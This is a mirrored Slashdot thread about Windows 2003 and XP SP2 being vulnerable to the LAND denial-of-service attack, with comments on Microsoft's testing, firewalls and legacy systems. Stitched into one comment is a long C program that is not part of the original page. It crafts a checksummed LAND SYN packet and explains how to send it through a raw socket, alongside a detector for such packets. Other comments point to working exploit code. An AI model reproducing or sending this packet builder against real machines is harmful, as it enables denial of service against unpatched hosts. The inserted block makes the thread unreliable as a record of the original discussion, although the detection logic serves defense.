Slashdot Mirror


Windows 2003 and XP SP2 Vulnerable To LAND Attack

An anonymous reader writes "Dejan Levaja, a Serbian security engineer, has discovered that nearly 8 years after the attack was first made public, Windows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this to work, but there's a whole lotta machines that don't have it turned on.


  1. Only win ? by mirko · · Score: 4, Interesting

    Are only Windows platforms vulnerable, or will these attacks be successful on other, non-MS platforms?

    --
    Trolling using another account since 2005.
    1. Re:Only win ? by ip_fired · · Score: 3, Interesting

      I compiled land.c on Linux and then had it test my PowerBook (OS X.3.8) on an open port. Nothing happened, thus it's not exploitable.

      If anyone is interested, I had to modify the program to get it to work in Linux (the structures have changed since this was originally written).

      Here is a patch so you can test other OSes.

      land.diff

      Curse you slashcode! It won't let me inline the patch. Oh well. Download it if you want it.

      --
      Don't count your messages before they ACK.
  2. What kind of software dev process do MS use? by Ex+Machina · · Score: 5, Interesting

    Isn't this EXACTLY what regression tests were designed for?

    1. Re:What kind of software dev process do MS use? by KDN · · Score: 5, Interesting
      Several jobs ago, I did software development. The manager didn't like how every time I found a significant bug I added it to a test library that I kept and ran against every version of the code that I was about to put out to the group. His thought was "the odds of someone making the same mistake twice are nonexistent". One time he told me to put the code out before it was done with the regression tests. Sure enough, crash and burn. And yes, my regression tests later caught the bug. Never again.

      As a further indication that I was right, I put an interface around the public interface of my libraries to validate all the parameters and actions. I noticed some people would make the same error so much that I even personalized some of the error messages. Like: "You're passing a string instead of an address, John", and "You're reading from a closed object, Kevin".

  3. On a more serious note.. by tabkey12 · · Score: 5, Interesting
    Blanket attacks (like Blaster, where every Windows computer on the net with Windows sharing on is hit about 6 times an hour) are usually only viable when the default configuration is insecure.

    At least with SP2 there is some basic security in terms of the firewall being on by default.

    Still, never thought I'd see a slashdot article linking to a page about Trumpet Winsock in 2005!

  4. Can anyone confirm? by Anonymous Coward · · Score: 5, Interesting

    A friend showed this to me a few days ago and I was unable to reproduce the attack over the LAN, both with my own code and some code of the original LAND found with Google. Both were run from Linux by opening a raw socket, filling in IP and TCP headers including checksums using the structs in ip.h and tcp.h, and sending with sendto(). In both cases Ethereal would show the packet as received but the machine would operate normally.

  5. Am I vulnerable? by SteelV · · Score: 3, Interesting

    I have yet to install SP2 because I heard it hurts performance of some computer games, which is mainly what I use my Windows PC for.

    I am otherwise up-to-date with Windows updates. I have a Linksys router for my internet connection, but no software firewall.

    Am I vulnerable to this and other issues? Should I update to SP2 already (the first time I tried it crashed while installing, didn't even work, but I could prob. get it to work next time). Or should I stay with SP1 for games?

    Thank you.

  6. Re:Not that big of a deal by Dimensio · · Score: 4, Interesting

    I work in a university. Policy is not to have the Windows firewall turned on because it supposedly conflicts with a few needed applications. There is no hardware firewall whatsoever between the internal network and the outside world.

    Oh, and standard policy is to have user accounts set up as Administrator at all times.

    Cleaning up infected machines is a never-ending endeavour. Oddly, the few departments run by competent admins (as in, not the university's IT department) where user accounts are set up only as Users (among other things) don't have any security problems at all. I wonder why..

    Oh, and before anyone blames me: I'm a grunt with no authority whatsoever. I've voiced my objections to the way things are run, but I can do little more than that.

  7. Re:Little known fact by jd · · Score: 4, Interesting
    This is probably going to crack you up. Yes, they do. For secure communications, application serving, and (for the "intelligent" ships) navigation systems.
    There are people in the US Navy who are actively interested in Linux, but they are heavily outnumbered by fans of Windows and SCO Unix.

    --
    It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
  8. Damnit! by GoNINzo · · Score: 3, Interesting

    I pointed this out YEARS ago. I just don't understand why the updated winsock didn't get used in 2k when they overhauled the tcp stack. (and wow is that an old email addy. heh)

    --
    Gonzo Granzeau
    "Nothing the god of biomechanics wouldn't let you into heaven for.." -Roy Batty
  9. Re:News? by PyWiz · · Score: 3, Interesting

    Well, sure, as many people have pointed out, by disabling your firewall you are leaving yourself open to attacks. In addition, the LAND attack is merely a DoS attack and thus does not pose much threat to home computers (and servers would have firewalls).

    However, that is far from the point. The point is that 8 years after an attack was discovered, Microsoft's commercial OS was STILL vulnerable to it. Obviously, if they're leaving themselves open to such vintage attacks as LAND, their security testing processes can't be all that great, can they? What's there to assure us another more dangerous attack won't be discovered in the near future?

    At least in my opinion, this is yet another argument for open source. The MS developers that worked on this part of the code probably just threw some old stuff together and called it a day. The module was probably reviewed by few other people and thus such an obvious vulnerability was released in the final product. With an open source product like Linux, this kind of stuff rarely if ever happens. So many people are scrutinizing the code that the chances of an obvious vuln going unnoticed are next to nothing.

    I guess what I'm saying is, before you leave your critical data to a company propagating closed source products like MS, you should at least make sure they have their proverbial shit together first.

    -py

    --
    -py
  10. Re:wow by Maestro4k · · Score: 4, Interesting
    > but the reality is this vulnerability happened after SP2 was released.

    Actually no, this vulnerability showed up 8 years ago and was patched in Windows 98 I believe. So this isn't something new that Microsoft is just now learning about and needs to fix, it's something quite old. Since the vulnerability came out, ME, 2000 and XP all were released.

    > Perhaps they set up a firewall to allow them to fix things underneath without totally destroying everyone's networks?

    If you're trying to say that MS feels that having the firewall on by default in XP SP2 is a shortcut for fixing problems, well, I certainly HOPE they're not taking that attitude. Yes, the firewall needs to be on by default for better security, but they should have tested the OS against known vulnerabilities with the firewall off to be certain they wouldn't work. Failure to do so shows some serious problems in MS land.

    > When you have as large of an install base as MS does you can't shift things right away or you will lose customers, you have to make changes slowly and incrementally so that users don't get confused.

    You seem royally confused about what this actually is. Land is a DoS attack that is caused by sending a SYN packet to an open port on a machine with the source and destination addresses the same. This isn't something that is _needed_ by any app, it's a TCP/IP oddity, a packet that would normally never occur. Back 8 years ago it was understandable that MS and others didn't anticipate this attack, but after 8 years there's not any excuse.

    Simply, this is not something users are going to notice the lack of. They'll certainly notice it's there if their machine gets hit with a Land attack though. It is NOT a case of MS trying to make changes slowly to not confuse customers, it's a big blunder.

    > MS has been working a lot on connectivity over the last year or so with some protocol enhancements and increased IPv6 support. I imagine things are going to get worse before they get better, but don't kid yourself, they are working on fixing it.

    Frankly, if their "working on fixing it" involves re-introducing exploits first identified and fixed 8 YEARS ago then I'm certainly not going to hold my breath that they'll ever fix anything.

    Ultimately though, your defense of MS is unwarranted. They publicly declared a while back (1-2 years now I think) that security was going to be a primary focus for them. This was pre-SP2 days. That they re-introduced a vulnerability from eight years ago speaks great volumes about that focus. If MS wants to claim they're security-focused now they deserve the lumps they get for foolish mistakes like this.
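
    A worked version of what comments 4 and 10 describe, added here as an example; it is not code from the page, from land.c, or from Dejan Levaja. It builds the 40-byte IPv4+TCP SYN by hand (headers, IP checksum, TCP checksum over the pseudo-header) with the LAND condition of source address and port equal to destination address and port, and then runs a detection check over the raw frame. The header structs, helper names, the addresses 10.0.0.1 and 10.0.0.2, port 139 and all field values are my own constructed choices; the builder takes separate source and destination addresses so the same code also produces the ordinary SYN the detector must not flag.

```c
/* Added example, not code from the page or from land.c: build the SYN the thread describes
 * and detect it in a raw IPv4 frame.  Build: cc -std=c99 -Wall land_check.c */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>   /* htons, htonl, ntohs */
#define PROTO_TCP 6
#define TCP_SYN   0x02
/* Wire-layout headers (no options), defined locally because the <netinet/ip.h> and
 * <netinet/tcp.h> struct names differ between systems, as comment 1 found. */
struct ipv4_hdr {
    uint8_t  ver_ihl, tos;
    uint16_t tot_len, id, frag_off;
    uint8_t  ttl, protocol;
    uint16_t check;
    uint32_t saddr, daddr;
} __attribute__((packed));
struct tcp_hdr {
    uint16_t source, dest;
    uint32_t seq, ack_seq;
    uint8_t  doff_res, flags;
    uint16_t window, check, urg_ptr;
} __attribute__((packed));

/* RFC 1071 one's-complement sum of 16-bit big-endian words, continued from sum. */
static uint32_t csum_add(uint32_t sum, const void *buf, size_t len) {
    const uint8_t *p = buf;
    for (; len > 1; len -= 2, p += 2) sum += (uint32_t)((p[0] << 8) | p[1]);
    if (len) sum += (uint32_t)(p[0] << 8);
    return sum;
}

/* Fold carries, complement, and return the checksum field in wire byte order. */
static uint16_t csum_fold(uint32_t sum) {
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return htons((uint16_t)~sum);
}

/* TCP checksum over pseudo-header (addresses, zero, protocol, TCP length) + segment;
 * yields 0 when run over a segment whose check field is already correct. */
static uint16_t tcp_checksum(const struct ipv4_hdr *ip, const uint8_t *seg, size_t seglen) {
    uint8_t pseudo[12] = {0};
    uint32_t s = ip->saddr, d = ip->daddr;
    uint16_t tlen = htons((uint16_t)seglen);
    memcpy(pseudo, &s, 4); memcpy(pseudo + 4, &d, 4);
    pseudo[9] = PROTO_TCP; memcpy(pseudo + 10, &tlen, 2);
    return csum_fold(csum_add(csum_add(0, pseudo, 12), seg, seglen));
}

/* Write a 40-byte IPv4+TCP SYN src_be:port_be -> dst_be:port_be (network byte order).
 * The same address for src and dst is land.c's packet. Returns bytes written, 0 if cap too small. */
static size_t build_syn(uint8_t *buf, size_t cap, uint32_t src_be, uint32_t dst_be, uint16_t port_be) {
    const size_t total = sizeof(struct ipv4_hdr) + sizeof(struct tcp_hdr);
    if (cap < total) return 0;
    memset(buf, 0, total);
    struct ipv4_hdr *ip = (struct ipv4_hdr *)buf;
    struct tcp_hdr *tcp = (struct tcp_hdr *)(buf + sizeof *ip);
    ip->ver_ihl = 0x45; ip->tot_len = htons((uint16_t)total); ip->id = htons(0x1234);
    ip->ttl = 64; ip->protocol = PROTO_TCP; ip->saddr = src_be; ip->daddr = dst_be;
    tcp->source = tcp->dest = port_be; tcp->seq = htonl(0x12345678);
    tcp->doff_res = 5 << 4; tcp->flags = TCP_SYN; tcp->window = htons(2048);
    tcp->check = tcp_checksum(ip, (uint8_t *)tcp, sizeof *tcp);  /* computed while check == 0 */
    ip->check = csum_fold(csum_add(0, ip, sizeof *ip));
    return total;
}

/* Detection: 1 if buf holds an IPv4 TCP SYN whose source address equals its destination
 * address (a packet no genuine peer ever sends), else 0. */
static int is_land_packet(const uint8_t *buf, size_t len) {
    if (len < sizeof(struct ipv4_hdr)) return 0;
    const struct ipv4_hdr *ip = (const struct ipv4_hdr *)buf;
    size_t ihl = (ip->ver_ihl & 0x0f) * 4u;
    if ((ip->ver_ihl >> 4) != 4 || ihl < 20 || ip->protocol != PROTO_TCP) return 0;
    if (len < ihl + sizeof(struct tcp_hdr)) return 0;
    const struct tcp_hdr *tcp = (const struct tcp_hdr *)(buf + ihl);
    return (tcp->flags & TCP_SYN) != 0 && ip->saddr == ip->daddr;
}

/* 1 if both the IP header checksum and the TCP checksum verify, else 0. */
static int checksums_ok(const uint8_t *buf, size_t len) {
    if (len < sizeof(struct ipv4_hdr)) return 0;
    const struct ipv4_hdr *ip = (const struct ipv4_hdr *)buf;
    size_t ihl = (ip->ver_ihl & 0x0f) * 4u, tot = ntohs(ip->tot_len);
    if (ihl < 20 || tot < ihl + sizeof(struct tcp_hdr) || tot > len) return 0;
    return csum_fold(csum_add(0, buf, ihl)) == 0 && tcp_checksum(ip, buf + ihl, tot - ihl) == 0;
}

/* Build a SYN to port 139 (constructed demo input), verify it, and classify it:
 * 1 = LAND, 0 = ordinary SYN, -1 = builder or checksum failure. */
static int classify_syn(uint32_t src_be, uint32_t dst_be) {
    uint8_t pkt[64];
    size_t n = build_syn(pkt, sizeof pkt, src_be, dst_be, htons(139));
    if (n != 40 || !checksums_ok(pkt, n)) return -1;
    return is_land_packet(pkt, n);
}
int main(void) {
    printf("10.0.0.1 -> 10.0.0.1: %d (1 = LAND)\n", classify_syn(htonl(0x0a000001u), htonl(0x0a000001u)));
    printf("10.0.0.2 -> 10.0.0.1: %d (0 = ordinary SYN)\n", classify_syn(htonl(0x0a000002u), htonl(0x0a000001u)));
    return 0;
}
```

    To actually put the packet on the wire you would do what comment 4 describes: open a raw socket (on Linux, `socket(AF_INET, SOCK_RAW, IPPROTO_RAW)`, which implies `IP_HDRINCL`) and pass the buffer to `sendto()`. The detection half flags on address equality alone rather than also requiring matching ports, because a frame arriving from the network that claims to come from the receiving host itself is anomalous regardless of port; that is the same condition Snort's `sameip` rule option tests, and it is the check a firewall or IDS in front of an XP SP1 box with no software firewall would need.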

  11. Solaris 2.5.1? Yes, it's still about. by hot_Karls_bad_cavern · · Score: 4, Interesting

    Believe it or not, some folks still use Solaris 2.5 and 2.6 versions. I used to work at a university whose physics department was fortunate enough to have two electron scanning microscopes, one old and huge and one new, smaller one. The old one had controlling software that was custom, to say the least, and written by a German firm that's been out of business for a few years now.

    Guess what OS the software ran on? And what hardware connections were custom to the old Sparc-based controller that ran the thing? Wohoo! Old Solaris was the only way it'd still 'go'.

    Well, sneaker-net wasn't going to work for the grads that were abroad and well, the profs wanted network access, so they were going to get it. Short of the long, we had to build, tweak and mess with all kinds of junk (tcpwrappers, ssh, ssl) before it went back on the network (yes, that donkey had been hacked before). So yes, there's lots of old Solaris still out there.

    And before anyone asks, yes I finally quit that job due to *not* being able to secure things like this. Authenticating gateways, openvpn, pf on Solaris (boss would *never* let me put that on all the machines we cared for ... unbelievable really), moving *away* from Sendmail, installing Solaris machines with everything locked down, etc, etc. Drove me fucking mad.

  12. Linux version of the exploit by duncanthrax · · Score: 3, Interesting

    Yes, it actually works on SP2. Fire up Task Manager and watch CPU load reach 100% for ~10 seconds for a single packet.

    Here's the code that should compile on Linux.